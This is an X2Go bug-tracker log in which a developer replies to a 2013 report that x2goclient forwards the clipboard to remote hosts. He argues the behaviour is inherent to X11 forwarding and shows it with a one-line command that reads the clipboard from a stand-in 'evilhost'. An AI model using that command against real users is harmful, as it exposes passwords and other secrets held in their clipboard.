X2Go Bug report logs - #509
Document NX/X11 security issue: clipboard sniffing

Package: wiki.x2go.org; Maintainer for wiki.x2go.org is x2go-dev@lists.x2go.org;

Reported by: Christoph Anton Mitterer <calestyo@scientia.net>

Date: Mon, 1 Jul 2013 02:48:02 UTC

Severity: grave

Tags: security

Full log

Message #10 received at 258@bugs.x2go.org (full text, mbox, reply):

Received: (at 258) by bugs.x2go.org; 1 Jul 2013 11:49:58 +0000
From snalwuer@stud.informatik.uni-erlangen.de  Mon Jul  1 13:49:57 2013
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on
X-Spam-Status: No, score=0.0 required=5.0 tests=URIBL_BLOCKED autolearn=ham
X-Greylist: delayed 361 seconds by postgrey-1.34 at ymir; Mon, 01 Jul 2013 13:49:57 CEST
Received: from faui03.informatik.uni-erlangen.de (faui03.informatik.uni-erlangen.de [])
	by ymir (Postfix) with ESMTPS id AD2895DA79
	for <258@bugs.x2go.org>; Mon,  1 Jul 2013 13:49:57 +0200 (CEST)
Received: from faui0sr0.informatik.uni-erlangen.de (faui0sr0.informatik.uni-erlangen.de [])
	by faui03.informatik.uni-erlangen.de (Postfix) with ESMTP id 739AC6808EE;
	Mon,  1 Jul 2013 13:43:56 +0200 (CEST)
Received: by faui0sr0.informatik.uni-erlangen.de (Postfix, from userid 31763)
	id 6D466B604D8; Mon,  1 Jul 2013 13:43:56 +0200 (CEST)
Date: Mon, 1 Jul 2013 13:43:56 +0200
From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard
Message-ID: <20130701114356.GP2447@cip.informatik.uni-erlangen.de>
References: <1372646308.18508.2.camel@heisenberg.scientia.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1372646308.18508.2.camel@heisenberg.scientia.net>
X-Echelon-Scan: plutonium bomb osama revenge dirty allah satan iran victory
 dimona cocaine guantanamo centrifuge holy war pigs mossad nsa
X-Echelon-Result: Belligerent
User-Agent: Mutt/1.5.21 (2010-09-15)
On 13-07-01 04:56, Christoph Anton Mitterer <calestyo@scientia.net> wrote:
> Package: x2goclient
> Severity: grave
> Tags: security
> Hi.
> From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588
> It seems that per default (and I even found no way to disable it)
> x2goclient (and perhaps other related tools?) transmit the content of
> the clipboard to the remote host.

Yes, other related tools like X11. x2go is basically just a faster
version of the traditional xforwarding. In X11 every client can always
access the clipboard/selection/etc., so you will also have the same
security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
demonstrates this.

> As this may easily contain passwords or other sensitive information,
> this is a extremely critical hole.

I disagree, this is not a hole at all, it works as intended. Its just
that users are often not educated about the implications of passing
around passwords via the clipboard etc.

But I concur that the ability to switch off clipboard/selection/...
forwarding in the x2goagent/x2goclient would be nice to have. Patches
are of course always welcome.


Alexander Wuerstlein.

Send a report that this bug log contains spam.

X2Go Developers <owner@bugs.x2go.org>. Last modified: Fri Feb 3 14:17:37 2023; Machine Name: ymir.das-netzwerkteam.de

X2Go Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.